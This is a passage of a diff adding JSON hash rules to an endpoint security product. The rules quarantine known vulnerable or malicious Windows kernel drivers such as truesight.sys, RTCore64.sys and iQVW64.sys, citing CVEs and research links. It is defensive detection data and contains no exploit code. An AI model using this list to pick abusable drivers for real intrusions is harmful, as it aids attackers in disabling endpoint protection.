+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826815Z",
+ "creation_date": "2026-03-23T11:45:30.826818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826827Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8117b99bfa76722d593a60185368304e7eae96a2018430fb9382b740cc68ca7a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0e58ad1-f1b7-5dbe-9ef9-1d7b5cf2e12e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153971Z",
+ "creation_date": "2026-03-23T11:45:31.153973Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "007c79a894bb05c1e0a043a5a3468ae1b21c6bd28f77084045423200186691f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0e9d8a8-d11e-51a8-9829-1ad0a8239a2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156091Z",
+ "creation_date": "2026-03-23T11:45:31.156093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156098Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be335b1a16e6dcbe99f90c03756369969f88642a9a033bd797478f9a12d4bf74",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0effe10-7cd5-5baa-b6b8-50f8aba063ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141024Z",
+ "creation_date": "2026-03-23T11:45:31.141026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c702628c85e8c787562444eb9913a410644a9f7ebdb9e9257e233ace66f4299f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0f154df-6017-5411-87b9-a542eaec2bc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833726Z",
+ "creation_date": "2026-03-23T11:45:30.833730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d6194270f505b49f7b1289249605bf7000b97f52aa9f06cb7c1e94c50d71d39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d0fb6ec1-19e6-54c4-9ea9-e9c62583dfff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612317Z",
+ "creation_date": "2026-03-23T11:45:29.612318Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612324Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e32ab30d01dcff6418544d93f99ae812d2ce6396e809686620547bea05074f6f",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d10adcd6-224a-5685-8a40-93daddce5be7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828221Z",
+ "creation_date": "2026-03-23T11:45:30.828224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91f63fb221f9cc3d3042f0def671b3c9d8aa6daab71b31ce4c49289788d6b89b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d121ded0-fcba-52f4-9dfd-601f6d45d7b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477288Z",
+ "creation_date": "2026-03-23T11:45:31.477292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a874d95a024183c7f3f885180a4520b069df40e558598703cf56756510d97d49",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1220561-9f6f-5a70-bcf6-49d61d933be3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607613Z",
+ "creation_date": "2026-03-23T11:45:29.607615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f20541f859f21b3106e12d37182b1ea39bb75ffcfcddb2ece4f6edd42c0bab2",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d123778c-e263-5486-9dde-18562873d99e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824006Z",
+ "creation_date": "2026-03-23T11:45:31.824009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824016Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85149fa4fbeaf225c5bf7e8b2f84b21e4305bc8fa61098e0d3b9cc437479958e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d12edae2-6cb1-5d32-9c37-dbe58dc94c27",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474330Z",
+ "creation_date": "2026-03-23T11:45:30.474333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474342Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c03f7e80857630277d292ad7324541cad38f652a199d94bc18a10aef98c8bfa",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d13ff1c1-c131-5584-9e70-4288ce1d297b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829575Z",
+ "creation_date": "2026-03-23T11:45:31.829577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6f6ab1d4ee5f77b1333935ebb5afca18ed35c1773b940c4c9964329abe9be84",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1503b27-3457-582a-be96-293a11e62ff6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145147Z",
+ "creation_date": "2026-03-23T11:45:31.145149Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1be65ff6fb2f175ba8efcca55fd6ca238c817ca541735d4b89f9d771aaf682b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d16b0862-f27c-5873-a067-d000aef2e18e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976410Z",
+ "creation_date": "2026-03-23T11:45:29.976412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976417Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d17b2db5-bced-5852-84f2-718f6666b0c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814261Z",
+ "creation_date": "2026-03-23T11:45:31.814264Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5de574260ae036244f729af8d2d84800254161363a5c2916279fef35c9c0aea6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d18089a3-090d-516a-9b37-b938fe531db1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974969Z",
+ "creation_date": "2026-03-23T11:45:29.974971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974977Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4a7794cdb933d71f57cf9f31188c1152bdc9fc429e17a84c4f639942965311d",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1ac343b-ae92-5a76-9312-ee659f7dc767",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972336Z",
+ "creation_date": "2026-03-23T11:45:29.972338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f94d9180104c820c3d27f03e20f5bbc9d2a5bc2ae6e74baf2a848f2f1790ec8",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1b07451-19aa-5dd8-9251-9277051296ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825817Z",
+ "creation_date": "2026-03-23T11:45:30.825819Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e58d77e44f08795e33c421b7c3659ba898ac371b6f2986334e09078755a4f20",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1b2dddd-e643-5346-8487-b9634258fdd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147935Z",
+ "creation_date": "2026-03-23T11:45:31.147937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147942Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "320d0e2f0f941424f2f1c4ace98203648db1f1ceebb02365829f0ffe6fc4c8fc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1c9c98d-56e3-5c4c-9397-e7a014403630",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141290Z",
+ "creation_date": "2026-03-23T11:45:31.141292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b4b0a78190d65994a711b909cc14097b72510006a042770bd0a9f1548b9464b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1cd5a12-2903-5dbb-af5e-896d10ed6bc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831513Z",
+ "creation_date": "2026-03-23T11:45:30.831515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831521Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c7120fae962b3574d4953e088b1791c77482ec7dbb88ecd7acefd1934d91a77",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1e4ea94-73c3-5785-817c-3fdd4125a984",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605717Z",
+ "creation_date": "2026-03-23T11:45:29.605719Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605725Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f56db12cd91af1190611be06668b76f8456b8cbfd67b1b41e90a0aeeab61ebb0",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d1ee41bb-76ee-5d78-b3b5-2af43b5e7abf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812839Z",
+ "creation_date": "2026-03-23T11:45:31.812841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
